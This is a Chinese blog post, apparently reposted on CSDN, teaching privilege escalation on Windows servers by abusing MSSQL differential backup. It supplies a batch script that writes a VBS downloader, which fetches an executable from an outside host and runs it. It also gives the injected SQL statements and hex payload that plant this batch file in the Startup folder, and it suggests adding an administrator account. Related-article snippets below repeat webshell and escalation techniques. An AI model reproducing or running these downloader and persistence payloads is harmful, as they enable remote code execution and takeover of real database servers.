mysql差异备份提权_提权思路之MSSQL差异备份取系统权限

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量96 收藏
点赞数
文章标签: mysql差异备份提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34731217/article/details/113638483
版权

MSsql差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码

让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!

那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!

大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「开始」菜单\程序\启动

呵呵位置有了! 那么我们备份什么文件让系统能执行的呢?

这个是第一个关键点~!

EXE JS VBS BAT这些文件大家第一时间想到的了

那些我一个一个来分析 exe的话!绝对能了! 但是 MSsql差异备份这么多垃圾肯定会把exe弄坏的!

否决掉

然后到脚本

VBS 我们能不能把 他的垃圾信息注释掉呢? 不然VBS 会执行不了! OK 学过VBS的朋友都知道

VBS里面 有2种注释 ' 还有就是 rem

但是还是会有垃圾信息屏蔽不了

否决掉

JS呢? JS里面有多行注释的/**/ 但是 /* 不可能在首行吧?

否决掉

最后 剩下我们最熟悉的bat批处理了!

OK我们继续分析 bat里面注释是什么呢?也是REM,失败啊!之前vbs那里不行 这里的rem注释也一样不行的!

那么我们怎么办呢?其实很简单! 当我们在CMD下面敲错了命令系统会怎样呢?

说到这里 要是大家不往文章下面看也一样能想到方法了吧~

OK我们继续探~~这里是最最关键点,差异备份出来的垃圾信息我们可以通过用回车把他提交了!

而系统只当作无用的命令来处理!不影响我们的操作!

问题就这样解决了吗?不是的!~MSsql备份的时候,到一定的字符长度就会出现垃圾的字符,那个字符会影响我们的操作!

那么我们得把语句尽量缩少,越少越好~

OK那我们思路好了就采用bat 写一个VBS的下载者 然后执行这个下载者 最后通过下载者down回来的马子来获取系统权限

下面是我改过的生成下载者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs

echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs

echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs

echo G.Mode=3:G.Type=1:G.Open() >>k.vbs

echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs

k.vbs

t

下一个k.VBS然后k.vbs下载一个t.exe文件保存到本地 直接执行

记得记得我说过的代码前面一定要用回车把垃圾数据提交 最好2以上个回车

然后实现差异备份

alter database ISTO set RECOVERY FULL--

create table cmd (a image)--

backup log ISTO to disk = 'c:\cmd1' with init--

insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--

backup log ISTO to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--

drop table cmd--

OK bat出来了! 至于怎样让服务器重启呢!这个问题遗留给你们去讨论吧!

要是服务器直接开启了3389 那就更方便了! 直接bat 一个添加管理员的命令更爽!

总结

如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。

如您喜欢交流学习经验,点击链接加入交流1群:1065694478(已满)交流2群:163560250

常非一
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权思路之MSSQL差异备份系统权限
09-14
看了下面的文章,不是让大家搞破坏,大家可以加强自己服务器的安全性。
MSSQL to MySql 5.3
09-06
这可能包括在迁移前备份MSSQL数据库,在MySQL中创建数据库的快照,以及保持一段时间的双写,以便在必要时回滚。 10. **持续集成/持续部署(CI/CD)**: 对于企业级应用,确保有自动化的CI/CD流程,以支持未来的更新...
MSSQL差异备份系统权限
Quantum Intelligence
08-26 1527
 MSSQL差异备份系统权限TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!MSSQL差异备份webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是
mysql差异备份提权_MSSQL注入提权的一些方法
weixin_26642481的博客
02-08 138
MSSQL注入提权思路:SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)相关SQL语句XP_CMDSHELL:数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--Sp_OACreate:数字型;declare ...
MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权
weixin_33743248的博客
11-23 184
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into ...
MSSQL注入时的手工差异备份提权
CC's Blog
12-07 3463
转自某个转自别人的博客,最初是谁原创的不清楚了。。。 语句有点问题,修改了下(红色部分,提交一句话内容要进行SQL转码)。。。。 字符型 1.恢复当前库 ;alter database 当前库 set RECOVERY FULL-- 2.创建表cmd ;create table cmd (a image)-- 3.备份当前库到D:\sql ;backup log 当前库 to di
mssqlmysql 神器,转换轻松搞定!!
03-01
MSSQL是微软公司开发的关系型数据库管理系统,而MySQL是开源的、基于SQL标准的数据库系统,广泛应用于Web应用。两者在语法、功能和许可证上有显著区别,因此在迁移过程中需要注意兼容性和性能问题。 进行MSSQL到...
基于mssqlmysql遇到的问题
09-10
在IT行业中,数据库迁移是一项常见的任务,尤其是在不同的数据库系统之间,如从Microsoft SQL Server (mssql) 导出数据到MySQL。本文将深入探讨在进行这种迁移时可能遇到的问题,并提供解决方案。 首先,问题的核心...
MySQL To MSSQL
11-22
MySQL到MSSQL的数据迁移是一项常见的数据库操作,特别是在企业级应用中,可能因为业务需求、系统升级或数据整合等原因需要将MySQL数据库中的数据迁移到Microsoft SQL Server(MSSQL)中。这个工具“MySQL To MSSQL”...
mysql2mssql
07-20
MySQLSQL Server转换工具“mysql2mssql”是一款专门设计用于帮助用户将MySQL数据库的数据结构和数据迁移到Microsoft SQL Server的实用程序。这个工具对于那些需要在不同数据库系统之间进行数据迁移的IT专业人员...
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
mysql差异备份提权_复习一下sql server的差异备份
weixin_42190623的博客
02-08 82
复习一下sql server的差异备份更新时间:2007年03月08日 00:00:00 作者:MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backupdatabas...
mysql差异备份提权_MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权...
weixin_29313547的博客
02-08 154
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into cmd (a) values (...
SQL Server 数据库常见提权总结
最新发布
m0_64481831的博客
03-28 2108
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权
mssql提权总结
st3pby的博客
12-30 2672
mssql提权总结
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5667
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
数据库注入提权总结(三)
蚁景网安学院
08-12 4950
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
mssql差异备份拿shell
一个码农的笔记
03-08 5322
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值